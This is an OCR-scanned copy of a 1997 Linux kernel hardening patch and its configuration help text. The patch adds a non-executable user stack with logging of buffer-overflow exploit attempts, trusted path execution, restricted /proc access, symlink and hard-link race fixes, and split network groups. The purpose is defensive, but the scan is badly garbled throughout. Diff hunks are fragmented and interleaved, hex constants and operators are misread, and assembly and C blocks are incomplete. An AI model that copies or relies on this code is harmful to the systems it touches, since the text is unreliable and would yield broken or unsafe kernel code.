t trusted directory, it will simply not be allowed to run. This is 
t quite useful on a multi-user system where security is an issue. Users 
+t will not be able to compile and execute arbitrary programs (read: evil) 
+ from their home directories, as these directories are not trusted. 
+t This option is useless on a single user machine. 


tTrusted path execution (EXPERIMENTAL) 
tCONFIG_TPE_LOG 
+ This option enables logging of execution attempts from non-trusted 
+t paths. 


+Secure mode (EXPERIMENTAL) 

+tCONFIG_SECURE_ON 

+ This bumps up the securelevel from 0 to 1. When the securelevel is ‘on’, 
t+ immutable and append-only bits cannot be set or cleared. If you are not 


t concerned with security, you can say ‘N*. 
tSplit Network Groups (EXPERIMENTAL) 
tCONFIG SPLIT_GID 
+ This is a simple kernel patch that allows you to perform certain 

+t privileged operations with out requiring root access. With this patch 

t three groups become privileged groups allowed to do different operations 
t within the kernel. 

t GID 16 allows programs to bind to privledged ports. 

+t GID 17 allows programs to open raw sockets. 

t GID 18 allows programs to open sock packets. 


Processor type 
CONFIG_M386 
This is the processor type of your CPU. It is used for optimizing 
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new mars-nwe and other fil 


At 


writing none of these are available. 
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unless you r 


+Symlink security 


EXP 


( 


fix 


ERIM 


ENTAL) 


+CONFIG_SYMLINK_FIX 
lass of security hole 
ng a symbolic 
When the victim then writes to that file they 
Enabling this option fixes 


A very commo 
a malicious 
another user 


inadvertently write to the wrong file. 


nc 
user creati 
is fite. 


servers. 


the time of 


So it’s safest to say N here 


this feature. 


on UNIX-like systems involves 


link in /tmp 


pointing at 


this class of hole by preventing a process from following a link 


which is in a +t directory unless they own the 
fix does not affect links owned by root, 
created by someone having root access already. 
from using a hard link instead, 


lin 


k. However, 


users to create hard links in a +t directory to files they don’t 


own. 
is more impo 


attempts. 
safe. Say Y. 


rtant. 


Minix fs support 
CONFIG _MINIX_FS 


+Log symlink exploit attempts 
+CONFIG_SYMLINK_LOG 
This option enables logging of symlink 
No more than one attempt per minute is 


Note that this fix might break things. 


(and hard 


link) 
logged, 


exploit 


this 
since these could only be 
[To prevent someone 
this fix does not allow non-root 


Only say Y if security 


so this is 


RICT 


= 


diff -ru linux-stock/arch/i386/config.in linux-patched/arch/i386/config.in 
--- linux-stock/arch/i386/config.in Sun May 12 21:17:23 1996 

+++ linux-patched/arch/i386/config.in Sun Nov 9 12:38:27 1997 

@@ -35,6 +35,15 @@ 

tristate ’Kernel support for ELF binaries’ CONFIG_BINFMT_ELF 

Lt "SCONFIG_EXPERIMENTAL" = "y" ]; then 

tristate ’Kernel support for JAVA binaries’ CONFIG_BINFMT_JAVA 

+ bool ’Non-executable user stack area (EXPERIMENTAL) ’ CONFIG _STACKEXEC 

+ if [ "SCONFIG_STACKEXEC" = "y" ]; then 

+ bool ’ Autodetect GCC trampolines’ CONFIG_STACKEXEC_AUTOENABLE 

+ bool ’ .og buffer overflow exploit attempts’ CONFIG_STACKEXEC_LOG 

+ fi 

+ bool ’ Restrict process table viewing (EXPERIMENTAL) ’ CONFIG_PROC_REST 
+ bool ’ Trusted path execution (EXPERIMENTAL) ’ CONFIG_TPE 

ne bool ’ Log untrusted path execution attempts (EXPERIMENTAL)’ CONFIG_TP 
+ bool ’ Split Network GIDs (EXPERIMENTAL)’ CONFIG_SPLIT_GID 

if ds 

bool '’Compile kernel as ELF - if your GCC is ELF-GCC’ CONFIG_KERNEL_ELF 
diff -ru linux-stock/arch/i386/defconfig linux-patched/arch/i386/defconfig 
--- linux-stock/arch/i386/defconfig Mon Sep 22 13:44:01 1997 
+++ linux-patched/arch/i386/defconfig Sun Nov. 9 12:38:23 1997 

@@ -24,6 +24,10 @@ 

CONFIG_SYSVIPC=y 

CONF IG_BINFMT_AOUT=y 

CONF IG_BINFMT_ELF=y 
+# CONFIG_STACKEXEC is not set 
+CONFIG_STACKEXEC_AUTOENABLE=y 
+CONFIG_STACKEXEC_LOG=y 
+CONFIG_SPLIT_GID=y 

CONFIG_KERNEL_ELF=y 


@e 


CONF IG_M386 
t+ CONFIG_M486 is not set 
-134,6 +138,8 @@ 
Filesystems 


is not set 


CONFIG_QUOTA is not set 
CONFIG_SYMLINK_FIX is not set 
+CONFIG_SYMLINK_LOG=y 


CONF IG_MINIX_FS=y 


E 


__LOG 
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# CONFIG_EXT_FS is not set 
CONF IG_EXT2_FS=y 
@@ -143,6 +149,9 @@ 


# CONFIG _VFAT_ 
UMSDOS_FS is not set 


# CONFIG_ 
CONF IG_PROC_F 


+CONFIG_ 
+CONFIG_ 


PE=y 
PE 


CONFIG_ 


+CONFIG_PROC_R 


FS is not set 


S=y 
ESTRICT=y 


_ LOG=y 
CONFIG_NFS_FS= 


y 
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ROOT_NFS is not set 
CONFIG_SMB FS is not set 


diff -ru linux-stock/arch/i386/kernel/head.S linux-patched/arch/i386/kernel/head.sS 


+++ 
@@ -400,10 +40 

.qu 

-quad 

-quad 
+#ifdef CONFIG_ 
+ -quad 
-quad 
ad 
ad 


t+#else 
ad 
ad 
ad 
ad 


endif 
Pa caiml eal 


-qu 


+++ 


@@ -423,6 +423, 


diff -ru linux-stock/arch/i386/kernel/signal 


ifdef CONFIG_ 
ad 0x00c09a0000000000 
diff -ru linux-stock/arch/i386/kernel/ptrace.c 
linux-stock/arch/i386/kernel/ptrace.c 
linux-patched/arch/i386/kernel/ptrace.c 

@@ -413,7 +413, 


0,17 @@ 


Oxc0c39a000000 
Oxc0c392000000 
STACKEXEC 
0x00cafa000000 
O0x00cb£2000000 
0x00cbda000000 
0x00cbd2000000 


0x00cbf£a000000 
0x00cb£2000000 
0x000000000000 
0x000000000000 


2*NR_TASKS, 8,0 
APM 


7 @@ 


10 @@ 


linux-stock/arch/i386/kernel/head.S Tue Aug 
linux-patched/arch/i386/kernel/head.S 


ad 0x0000000000000000 


Fh Fh 
Fh Fh 


Fh FH Fh Fh 
Fh FH Fh Fh 


fh Fh 
bh Fh 
h Fh 
h Fh 


0000 
0000 


addr == FS | 
addr == CS | 
data &= 
if (data 
if (data 
addr == EFL) 


5 09:19:53 1997 
Sun Nov 9 00:55:50 1997 


/* not used */ 

/* 0x10 kernel 1GB code at 0xC0000000 */ 
/* 0x18 kernel 1GB data at 0xC0000000 */ 
/* 0x23 user 2.75GB code at 0 */ 

/* Ox2b user 3GB data at 0 */ 

/* 0x32 user 3GB code at 0, DPL=2 */ 
/* Ox3a user 3GB stack at 0, DPL=2 */ 
/* 0x23 user 3GB code at 0x00000000 */ 
/* Ox2b user 3GB data at 0x00000000 */ 
/* not used */ 


not used */ 
space for LDT’s and TSS’s etc */ 
/* APM 


cs code */ 


Mon Aug 4 12:12:22 1997 
Sun Nov 9 00:55:50 1997 
| addr == GS || 
| addr == SS) { 
Oxffff; 
&& (data & 3) != 3) 
&& (data & 3) < 2) 
return —-EIO; 


{ /* flags. */ 


/* Do not allow the user to set the debug register for kernel 


address 
f(addr < 
iE 

if ( 


if 


retu 


space */ 
17) { 
addr EIP 
put_stack_lo 


put_stack_lo 


return —- 


(put_stack_ 


return - 
rn 0; 


linux-patched/arch/i386/kernel/ptrace.c 


&& (data & O0xF0000000) == 0xBO0000000) 

ng(child, CS*sizeof (long) -MAGICNUMBER, USER_HUGE_ 
ng(child, SS*sizeof (long) -MAGICNUMBER, USER_HUGE_ 
E10; 

long(child, sizeof (long) *addr-MAGICNUMBER, data) ) 
E10; 


-—-- linux-stock/arch/i386/kernel/signal.c Mon Aug 4 12:12:51 1997 
+++ linux-patched/arch/i386/kernel/signal.c Sun Nov 9 00:55:50 1997 
@@ -83,10 +83,10 @&@ 
#define COPY_SEG(x) \ 
if ( (context.x & Oxfffc) /* not a NULL selectors */ \ 
&& (context.x & 0x4) != 0x4 /* not a LDT selector */ \ 
- && (context.x & 3) != 3 /* not a RPL3 GDT selector */ \ 
+ && (context.x & 3) < 2 /* not a RPL3 or RPL2 GDT selector */ \ 
) goto badframe; COPY (x); 


.c linux-patched/arch/i386/kernel/signal.c 
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#define COPY_SEG_STRICT(x) \ 
-if (!(context.x & Oxfffc) || (context.x & 3) != 3) goto badframe; COPY (x); 
+if (!(context.x & Oxfffc) || (context.x & 3) < 2) goto badframe; COPY (x); 
struct sigcontext_struct context; 
struct pt_regs * regs; 
@@ -167,16 +167,20 @@ 
unsigned long * frame; 
frame = (unsigned long *) regs-—>esp; 
7 if (regs->ss != USER_DS && sa->sa_restorer) 
+ if (regs->ss != USER_DS && regs->ss != USER_HUGE_SS && sa->sa_restorer) 
frame = (unsigned long *) sa->sa_restorer; 
frame -= 64; 
if (verify_area (VERIFY_WRITE, frame, 64*4) ) 
do_exit (SIGSEGV) ; 
/* set up the "normal" stack seen by the signal handler (iBCS2) */ 
+#ifdef CONFIG_STACKEXEC 
+ put_user((unsigned long)MAGIC_SIGRETURN, frame); 
+#else 
define __CODE ((unsigned long) (frame+24) ) 
define CODE(x) ((unsigned long *) ((x)+__CODE) ) 
put_user (__CODE, frame) ; 
ttendif 
if (current-—>exec_domain && current-—>exec_domain->signal_invmap) 
put_user (current-—>exec_domain->signal_invmap[signr], frametl); 
else 
@@ -204,19 +208,17 @@ 


/* non-iBCS2 extensions.. 
put_user (oldmask, 


, 


frame+22); 


put_user(current-—>tss.cr2, 


frame+23); 


+#ifndef CONFIG_STACKEXEC 
/* set up the return code... */ 
put_user (0x0000b858, CODE(0)); /* popl %eax ; movl $,%eax */ 
put_user (0x80cd0000, CODE(4)); /* int $0x80 */ 
put_user(__NR_sSigreturn, CODE(2)); 
#undef _ CODE 
#undef CODE 
+#endif 
/* Set up registers for signal handler */ 
= regs->esp = (unsigned long) frame; 
7 regs->eip = (unsigned long) sa->sa_handler; 
= regs->cs = USER_CS; regs->ss = USER_DS; 
a regs->ds = USER_DS; regs->es = USER_DS; 
- regs->gs = USER_DS; regs->fs = USER_DS; 
+ start_thread(regs, (unsigned long)sa->sa_handler, (unsigned long) frame) ; 
regs->eflags &= ~TF_MASK; 


} 


diff -ru linux-stock/arch/i386/kernel/traps.c linux-patched/arch/i386/kernel/traps.c 
linux-stock/arch/i386/kernel/traps.c Mon Aug 11 13:37:24 1997 


+++ linux-patched/arch/i386/kernel/traps.c Sun Nov 9 00:55:50 1997 
@@ -117,7 +117,7 @@ 

esp = (unsigned long) &regs-—>esp; 

ss = KERNEL_DS; 
= if ((regs->eflags & VM_MASK) || (3 & regs->cs) == 3) 
+ if ((regs->eflags & VM_MASK) || (3 & regs->cs) >= 2) 

return; 
if (regs->cs & 3) { 
sp = regs->esp; 

@@ -193,11 +193,82 @@ 


asmlinkage void do_ge 


{ 
+#ifdef CONFIG_STACK 


neral_protection(struct pt_regs * regs, long error_code) 


EXEC 
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+#endif 


unsigned long retaddr; 


if (regs->eflags & VM_MASK) { 


handle_vm86_fault ((struct vm86_regs *) 


return; 


} 


+#ifdef CONFIG_STACKEXEC 
+/* Check if it was return from a signal handler 


regs, error_code); 


*/ 


+ if (regs->cs == USER_CS || regs->cs == USER_HUGE_CS) 

+ if (get_seg_byte(USER_DS, (char *)regs->eip) == 0xC3) 

+ if (!verify_area(VERIFY_READ, (void *)regs->esp, 4)) 

te if ((retaddr = get_seg_long(USER_DS, (char *)regs->esp)) == 
+ MAGIC_SIGRETURN) { 


Call sys_sigreturn() to restore the context. 


to convert sys_sigreturn () 


+ * pt_regs, making this faster... 

+ */ 

+ regs-—>esp += 8; 

+ __asm__("movl %3,%%esi;" 

e "Subl %1,%%esp;" 

+ "movl %2,%%ecx;" 

+ "movl S%Sesp,%%edi;" 

+ "cld; rep; movsl;" 

+ "call sys_sigreturn;" 
+ "leal %3,%%edi;" 

a "addl %1,%%edi;" 

+ "movl S%Sesp,%%Sesi;" 

+ "movl (%%edi),%%edi;" 
+ "movl %2,%%ecx;" 

+ "cld; rep; movsl;" 

+ "movl S%Sesi,s%esp" 


+/* %Seax is returned separately */ 


+ "=a" (regs—>eax) 

+ "i" (sizeof (*regs)), 

+ "i" (sizeof (*regs) >> 2), 

ee Nin" (regs) 

re Nox", wo b.auen Wea Wala, MOE 7 
ate return; 

+ } 

+#ifdef CONFIG _STACKEXEC_LOG 


+/* 
* Check if we’re returning to the stack area, 
* when attempting to exploit a buffer overflow. 


*/ 


else if (regs->cs == USER_CS && 
(retaddr & 0xF0000000) 0xBO0000000) 


endif 
endif 


die_if_kernel("g 


It would definitely be better 


into an inline function accepting a pointer to 


"memory") ; 


which is only likely to happen 


security_alert ("buffer overflow"); 


neral protection", regs,error_code) ; 


+#if defined (CONFIG_STACK 
+/* 

* Switch to the original huge code segment 
* stack for this entire process), 
* except for call %esp. 


EXEC) 


+ */ 
+ if (regs->cs == USER_CS) 

+ if (get_seg_byte(USER_DS, (char *)regs-—>eip) 
+ (get_seg_byte(USER_DS, 


&& defined (CONFIG_STACK 


(char *) (regs->eip + 1)) 


4 


EC_AUTO 


ENABLE) 


(and allow code execution on the 
if the faulty instruction is a call %reg, 


OxFF && 
& OxD8) 


OxDO && 


.txt 


+ } 
+#endif 


current-—>tss.error_code 
current—>tss.trap_no 
force_sig (SIGS! 
linux-stock/arch/i386/mm/fault.c linux-patched/arch/i386/mm/fault. 
linux-stock/arch/i386/mm/fault.c 


diff -ru 
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get_seg_byte 


current-— 


regs->cs 
return; 


EGV, 


10 


(USER_DS, (char *) (regs->eip + 1)) != OxD4) { 
>flags |= PF_STACKEXEC; 
= USER_HUGE_CS; regs->ss = USER_HUGE_SS; 


3% 


error _code; 


current); 


+++ linux-patched/arch/i386/mm/fault.c 
@@ -44,6 +44,7 @@ 
unsigned long page; 
int write; 
“ if ((regs->cs & 3) >= 2) 
/* get the address */ 
__asm__("movl %%cr2,%0":"=r" 


down (&mm->mmap_sem) ; 


Sat Aug 16 22:21:20 1997 


Sun Nov 


error_code 


4; 


(address) ); 


9 00:55:50 1997 


EC; 


diff -ru linux-stock/fs/binfmt_aout.c linux-patched/fs/binfmt_aout.c 
-—--— linux-stock/fs/binfmt_aout.c Wed Oct 15 14:56:43 1997 
+++ linux-patched/fs/binfmt_aout.c Tue Nov 11 00:38:48 1997 
@@ -315,6 +315,7 @@ 
current-—>suid = current-—>euid = current-—>fsuid = bprm->e_uid; 
current-—>sgid = current-—>egid = current->fsgid = bprm->e_gid; 
current-—>flags &= ~PF_FORKNOEXEC; 
+ if (N_FLAGS (ex) & F_STACKEXEC) current->flags |= PF_STACKEX 
if (N_MAGIC(ex) == OMAGIC) { 
#ifdef _ alpha__ 
do_mmap (NULL, N_TXTADDR(ex) & PAGE_MASK, 
diff -ru linux-stock/fs/binfmt_elf.c linux-patched/fs/binfmt_elf.c 
--- linux-stock/fs/binfmt_elf.c Wed Oct 15 14:56:43 1997 
+++ linux-patched/fs/binfmt_elf.c Tue Nov 11 01:02:05 1997 
@@ -55,7 +55,10 @@ 
#define ELF_PAGESTART(_v) ((_v) & ~ (unsigned long) (ELF_EXEC_PAGESIZE-1) ) 
define ELF_PAGEOFFSET(_v) ((_v) & (ELF_EXEC_PAGESIZE-1) ) 


static struct linux_bi 


nfmt elf_format 


= 


+#ifndef CONFIG_STACKEXEC 
+static 
+#endif 
+struct linux_binfmt elf_format = { 
ifndef MODULE 
NULL, NULL, load_elf_binary, load_elf_library, elf_core_dump 
else 
@@ -662,6 +665,7 @@ 
current-—>suid = current-—>euid = current-—>fsuid = bprm->e_uid; 
current-—>sgid = current-—>egid = current->fsgid = bprm->e_gid; 
current->flags &= ~PF_FORKNOEXEC; 
+ if (elf_ex.e_flags & EF_STACKEXEC) current->flags |= PF_STACKEXEC; 
bprm->p = (unsigned long) 
create_elf_tables((char *)bprm->p, 


bprm->argc, 


diff -ru linux-stock/fs/exec.c linux-patched/fs/exec.c 


linux-stock/fs/exec.c 


+++ 
@e 
} 


linux-patched/fs/exec.c 
-475,6 +475,8 @@ 


current-—>comm[i] 


/* Release all of the old mmap stuff. 
(exec_mmap () ) 


it 


@e 


return —- 


-650,12 +652,30 @@ 


= IN\O'S 


ENOM 


EM; 


current->flags &= ~PF_STACKEX 


EC; 


ey 


Wed Oct 15 14:56:43 1997 
Tue Nov 11 12:59:51 1997 
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int do_execve(char * filename, char ** argv, char ** envp, struct pt_regs * regs) 
{ 
struct linux_binprm bprm; 
+ struct inode *dir; 
+ const char *basename; 
+ int namelen; 
int retval; 


int i; 
bprm.p = PAGE_SIZE*MAX_ARG_PAGES-sizeof (void *); 
for (i=0 ; i<MAX_ARG PAGES ; itt) /* clear page-table */ 


bprm.page[i] = 0; 
+#ifdef CONFIG_TPE 
- /* Check to make sure the path is trusted. If the directory is root 
+ * owned and not group/world writable, it’s trusted. Otherwise, 

+ * return -EACCES and optionally log it 


4 * / 
+ dir_namei(filename, &namelen, &basename, NULL, é&dir); 
a if (dir->i_mode & (S_IWGRP | S_IWOTH) || dir->i_uid) 


+ { 
+#ifdef CONFIG_TPE_LOG 
+ security_alert ("Trusted path execution violation"); 
+#endif /* CONFIG_TPE_LOG */ 
+ return —EACCES; 
a } 
+#endif /* CONFIG_TPE */ 
retval = open_namei(filename, 0, 0, &bprm.inode, NULL); 
if (retval) 
return retval; 


=) 


diff -ru linux-stock/fs/namei.c linux-patched/fs/namei.c 
-—-- linux-stock/fs/namei.c Sat Aug 16 16:23:19 1997 
+++ linux-patched/fs/namei.c Tue Nov 11 00:44:51 1997 


@@ -19,6 +19,7 @@ 

include <linux/fcntl.h> 
include <linux/stat.h> 
include <linux/mm.h> 
+#include <linux/config.h> 


define ACC_MODE(x) ("\000\004\002\006"[ (x) &£O_ACCMOD 


Gl 
aa 
~~ 


@@ -207,6 +208,23 @@ 

*res_inode = inode; 

return 0; 

} 

+#ifdef CONFIG_SYMLINK_FIX 
+/* 
+ * Don’t follow links that we don’t own in +t directories, unless the link 
+ * is owned by root. 
re 
th if (S_ISLNK (inode->i_mode) && (dir->i_mode & S_ISVTX) && 
+ inode->i_uid && 
+ current->fsuid != inode->i_uid) { 
+#ifdef CONFIG_SYMLINK_LOG 
+ security_alert ("symlink"); 


+#endif 

+ iput (dir) ; 

+ iput (inode) ; 

+ *res_inode = NULL; 
+ return —EPERM; 

+ } 

+#endif 


return inode->i_op->follow_link (dir, inode, flag,mode, res_inode) ; 


} 


@@ -216,8 +234,13 @@ 
* dir_namei() returns the inode of the directory of the 
* specified name, and the name within that directory. 
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* / 
+#ifdef CONFIG_TPE 
tint dir_namei(const char *pathname, int *namelen, const char **name, 
+ struct inode * base, struct inode **res_inode) 
+#else 
static int dir_namei(const char *pathname, int *namelen, const char **name, 
struct inode * base, struct inode **res_inode) 
+#endif /* CONFIG_TPE */ 


char c; 
const char * thisname; 
@@ -787,6 +810,22 @@ 
iput (dir); 
return —-EPERM; 


} 
+#ifdef CONFIG_SYMLINK_FIX 
+/* 
+ * Don’t allow non-root users to create hard links to files they don’t own 
+ * in a +t directory. 


+ */ 
+ if ((dir->i_mode & S_ISVTX) && 

+ current->fsuid != oldinode->i_uid && 
+ 'fsuser()) f 


+#ifdef CONFIG_SYMLINK_LOG 
+ security_alert ("hard link"); 


+#endif 

4 iput (oldinode) ; 
fn iput (dir); 

4 return -EPERM; 
+#endif 


if (IS_RDONLY(dir)) { 

iput (oldinode) ; 

iput (dir); 

diff -ru linux-stock/fs/proc/base.c linux-patched/fs/proc/base.c 
---— linux-stock/fs/proc/base.c Wed Feb 21 01:26:09 1996 

+++ linux-patched/fs/proc/base.c Sun Nov. 9 10:53:19 1997 
@@ -74,7 +74,11 @@ 


struct proc_dir_entry proc_pid = { 
PROC_PID_INO, 5, "<pid>", 
- S_IFDIR | S_IRUGO | S_IXUGO, 2, 0, O, 
+#ifdef CONFIG_PROC_RESTRICT 
a S_IFDIR | S_IRUSR | S_IXUSR, 2, 0, O, 
+#else 
st? S_IFDIR | S_IRUGO | S_IXUGO, 2, 0, O, 
+#endif /* CONFIG_PROC_RESTRICT */ 
0, &proc_base_inode_operations, 
NULL, proc_pid_fill_inode, 
NULL, &proc_root, NULL 
diff -ru linux-stock/fs/proc/inode.c linux-patched/fs/proc/inode.c 


--- linux-stock/fs/proc/inode.c Sat Nov 30 02:21:21 1996 
+++ linux-patched/fs/proc/inode.c Sun Nov 9 10:58:06 1997 
@@ -153,7 +153,11 @@ 
if ('p || i >= NR_TASKS) 
return; 
if (ino == PROC_ROOT_INO) { 


- inode->i_mode = S_IFDIR | S_IRUGO | S_IXUGO; 
+#ifdef CONFIG _PROC_RESTRICT 
+ inode->i_mode 
t+#else 
+ inode->i_mode = S_IFDIR | S_IRUGO | S_IXUGO; 
+#endif /* CONFIG _PROC_RESTRICT */ 

inode->i_nlink = 2; 

for (i = 1; i < NR_TASKS ; itt) 

if (task[i]) 


S_IFDIR | S_IRUSR | S_IXUSR; 


@@ -171,7 +175,11 @@ 
inode->i_nlink = 2; 
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break; 
case PROC_SCSTI: 
+#ifdef CONFIG _PROC_RESTRICT 
+ inode->i_mode 
+#else 


S_IFDIR | S_IRUSR | S_IXUSR; 


inode->i_mode 
+#endif /* CONFIG _PROC_RESTRICT */ 


S_IFDIR | S_IRUGO | S_IXUGO; 


inode->i_nlink = 2; 
inode->i_op = &proc_scsi_inode_operations; 
break; 


@@ -181,7 +189,11 @@ 


GJ 


inode->i_size (MAP_NR(high_memory) << PAGE_SHIFT) + PAG 


SIZE; 


break; 
case PROC_PROFILE: 
= inode->i_mode 
+#ifdef CONFIG _PROC_RESTRICT 
+ inode->i_mode = S_IFDIR | S_IRUSR | S_IXUSR; 
+#else 
+ inode->i_mode 
+#endif /* CONFIG _PROC_RESTRICT */ 


1 


S_IFREG | S_IRUGO | S_IWUSR; 


ll 
is 
4 
ra 


DIR | S_IRUGO | S_IXUGO; 


inode->i_op = &proc_profile_inode_operations; 
inode->i_size = (l+prof_len) * sizeof(unsigned long); 
break; 
@@ -203,7 +215,11 @@ 
return; 
case PROC_PID_MEM: 
inode->i_op = &proc_mem_inode_operations; 


= inode->i_mode = S_IFREG | S_IRUSR | S_IWUSR; 
+#ifdef CONFIG_PROC_RESTRICT 
+ inode->i_mode 
+#else 
+ inode->i_mode 
+#endif /* CONFIG_PROC_RESTRICT */ 
return; 
case PROC_PID_CWD: 
case PROC_PID_ROOT: 
diff -ru linux-stock/include/asm-i386/processor.h linux-patched/include/asm-i386/processor. 


ll 
n 


_IFDIR | S_IRUSR | S_IXUSR; 


S_IFDIR | S_IRUGO | S_IXUGO; 


---— linux-stock/include/asm-i386/processor.h Tue Mar 11 13:52:29 1997 
+++ linux-patched/include/asm-i386/processor.h Tue Nov 11 00:47:04 1997 
@@ -9,6 +9,8 @@ 


include <asm/vm86.h> 

include <asm/math_emu.h> 
+#include <linux/binfmts.h> 
+#include <linux/config.h> 


/* 
* System setup and hardware bug flags.. 
@@ -41,6 +43,15 @@ 


define TASK_SIZI 


GJ 


(OxCOOO0Q000UL) 


+#if£ defined (CONFIG _STACKEXEC) && defined (CONFIG _BINFMT_ELF) 
textern struct linux_binfmt elf format; 

+#define MMAP ADDR ( \ 
+ current->binfmt == &elf_format && \ 
+ !(current->flags & PF_STACKEXEC) \ 
+ ? O0x00110000UL \ 

ae : TASK SIZE / 3 ) 

+#endif 


/* 
* Size of io_bitmap in longwords: 32 is ports 0O-Ox3ff. 
+f 

@@ -134,14 +145,6 @@ 

#define alloc_kernel_stack () __get_free_page (GFP_KERNEL) 
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#define fr 


_kernel_stack (page) 
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EY 


14 


Pag 


( (page) ) 


-static inline void start_thread(struct pt_regs * regs, 


unsigned long eip, 


Pp) 
at 
7 regs->cs = USER_CS; 
= regs->ds regs->es regs->ss regs->fs regs->gs USER_DS; 
- regs->eip = eip; 
- regs->esp = esp; 
—} 
/* 
* Return saved PC of a blocked thread. 
ua 
@@ -151,3 +154,25 @@ 
} 
endif /* __ASM_1386_PROCESSOR_H */ 


if defined(current) 
define _ START_THRE 


&& 
AD 


!'defined (__START_THREAD) 


+static inline void start_thread(struct pt_regs * regs, 


unsigned long eip, 


P) 

+{ 

+#ifdef CONFIG_STACKEXEC 

+ if (current->flags & PF_STACKEXEC) { 

as regs->cs = USER_HUGE_CS; regs->ss = USER_HUGE_SS; 
SE } else { 

+ regs->cs = USER_CS; regs->ss = USER_DS; 

+ } 

+ regs->ds regs->es regs->fs regs->gs USER_DS; 
+#else 

+ regs->cs = USER_CS; 

+ regs->ds regs->es regs->fs regs->gs regs->ss USER_DS; 
t#endif 

+ regs->eip = eip; 

+ regs->esp = esp; 


+#endif /* __START_THREAD */ 
diff -ru linux-stock/include/asm-i386/segment.h 
--- linux-stock/include/asm-i386/segment.h Tue Apr 
+ linux-patched/include/asm-i386/segment.h Tue Nov 
@@ -1,11 +1,27 @@ 
ifndef _ASM_SEGMENT_H 
define _ASM_SEGMENT_H 
+#include <linux/config.h> 
define KERNEL CS 0x10 
define KERNEL DS 0x18 
define USER_CS 0x23 
define USER_DS O0x2B 
+#ifdef CONFIG_STACKEXEC 
+#define USER_HUGE_CS 0x32 
+#define USER_HUGE_SS Ox3A 
t+t#else 
+#define USER_HUGE_CS 0x23 
+#define USER_HUGE_SS 0x2B 
t#endif 
4/* 
+ * Magic address to return to the kernel from signal handlers, 
+ * beyond user code segment limit will do. 
+ */ 


9 00:35:29 1996 
11 00:47:13 1997 


any address 


unsigned long es 


unsigned long es 


linux-patched/include/asm-i386/segment.h 


6.txt 


diff -ru 


+ 
@ 


+ 


+ 
@ 


#ifndef 


++ 


aleiR 
de 


++ 


/* 
#de 


diff 


++ 


endif 
diff 


__ASSEMBLY__ 


152, 


fine F_STACKEXEC 


'defined 


—ru 


ETURN 


linux-stock/incl 
linux-stock/include/linux/a.out.h 
linux-patched/include/linux/a.out.h Tue Nov 11 00:47:21 1997 
@ -37,6 +37,9 @@ 
M_MIPS2 = 


(N_MAGIC) 
Fine N_MAGIC (exec) 


Wed Apr 26 09:43:42 2017 
+#define MAGIC_SIGR 


15 


OxC1428571 


Sat Aug 17 11:19:28 1996 


/* MIPS R6000/R4000 binary */ 


nstants for the N_FLAGS field */ 
Executable stack area forced */ 


1 Ah 


((exec).a_info & Oxffff) 


linux-stock/incl 
linux-stock/include/] 


inux/elf.h 


fine EM_ALPHA 


fine EF_STACKEXEC 


Fine DT_NULL 
-ru 


@ -78,6 +78,27 @@ 


\ 


de 
de 


linux-patched/incl 
@ -269,6 +269,8 


(( (addr) 
(( (addr) 


linux-stock/incl 
linux-stock/include/linux/kernel.h 
linux-patched/include/linux/kernel.h 


>> 16) 
>> 24) 


+#define security_alert (msg) 
static unsigned long warning_time = 


linux-patched/include/linux/elf.h 
@ -57,6 +57,9 @@ 


0x9026 


+/* Constants for the e_flags field */ 
Executable stack area forced */ 


A f% 


0 


& Oxff), \ 
& Oxff) 


{ \ 


if 


printk ( 


} else if 


(no_flood_yet) 
warning_time = 


printk ( 


endif /* _ KERNEL _ 


fine SI_LOAD SHIFT 
-ru linux-stock/incl 
linux-stock/include/linux/sched.h 


@@ 
fine PF_USEDFPU 
fine PF_DTRACE 


Py), 


+/* Make sure at least one minute passed since the 
(!warning_time 
warning_time = 


jiffies; 
\ 
KERN_ALERT \ 
"Possible 
KERN ALERT \ 
"Process %S 


current-—>comm, 
current-—>uid, 
{ \ 
jiffies; 
\ 

KERN_ALERT \ 


16 


0x00100000 
0x00200000 


lude/linux/kernel 


(pid %d, 


Sat Aug 10 00:03:15 1996 
Tue Nov 11 00:47:39 1997 


0, 


no_flood_yet = 1; 


uid %d, 
current->pid, \ 


current->euid); \ 


no_flood_yet = 


no_flood_yet = 


Ope OX 


{ \ 
\ 


"msg " exploit attempt:\n" \ 


euid %d).\n", \ 


Wed Oct 15 15:22:05 1997 


/* Process used the FPU this quantum 


/* delayed trace 


lude/linux/sched.h Tue Nov 11 00:47:48 1997 


(used on m68k) 


ude/linux/elf.h linux-patched/include/linux/elf.h 


last warning logged */ \ 
jiffies - warning_time > 60 * HZ) 


"More possible " msg " exploit attempts follow.\n"); 


Mi, 


lude/linux/a.out.h linux-patched/include/linux/a.out.h 


This is the info that is needed to parse the dynamic section of the file */ 


L.h linux-patched/include/linux/kernel.h 
Thu Aug 14 10:05:47 1997 
Tue Nov 11 00:47:44 1997 


\ 


lude/linux/sched.h linux-patched/include/linux/sched.h 


(SMP only) 


aes 
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+#define PF_STACKEXEC 0x01000000 /* Executable stack area forced */ 
/* 
* Limit the stack by to some sane default: root can always 
* increase this limit if needed.. 8MB seems reasonable. 


@@ -490,6 +492,9 @@ 


#define for_each_task(p) \ 
for (p = &init_task ; (p = p->next_task) != &init_task ; ) 


+/* x86 start_thread() */ 
+#include <asm/processor.h> 


#endif /* _ KERNEL * / 


diff -ru linux-stock/kernel/sched.c linux-patched/kernel/sched.c 
--- linux-stock/kernel/sched.c Fri Oct 17 13:17:43 1997 
+++ linux-patched/kernel/sched.c Sun Nov. 9 01:11:01 1997 
@@ -44,7 +44,11 @@ 

* kernel variables 


*/ 

+#ifdef CONFIG_SECURE_ON 

int securelevel = 1; /* system security level */ 
+#else 

int securelevel = 0; /* system security level */ 
+#endif 

long tick = (1000000 + HZ/2) / HZ; /* timer interrupt period */ 
volatile struct timeval xtime; /* The current time */ 
diff -ru linux-stock/mm/mmap.c linux-patched/mm/mmap.c 
—--— linux-stock/mm/mmap.c Fri Nov 22 06:25:17 1996 
+++ linux-patched/mm/mmap.c Tue Nov 11 00:48:26 1997 


@@ -308,7 +308,11 @@ 
if (len > TASK_SIZE) 
return 0; 
if (!addr) 
+#ifdef MMAP ADDR 
r addr = MMAP_ADDR; 


t+#else 


addr 


TASK_SIZE / 3; 


+#endif 
addr = PAGE ALIGN (addr) ; 


for (vmm = find_vma(current->mm, addr); ; vmm = vmm->vm_next) { 


diff -ru linux-stock/net/ipv4/af_inet.c linux-patched/net/ipv4/af_inet.c 
--- linux/net/ipv4/af_inet.c Fri Aug 15 12:23:23 1997 

+++ linux-stock/net/ipv4/af_inet.c Mon Dec 29 18:05:29 1997 

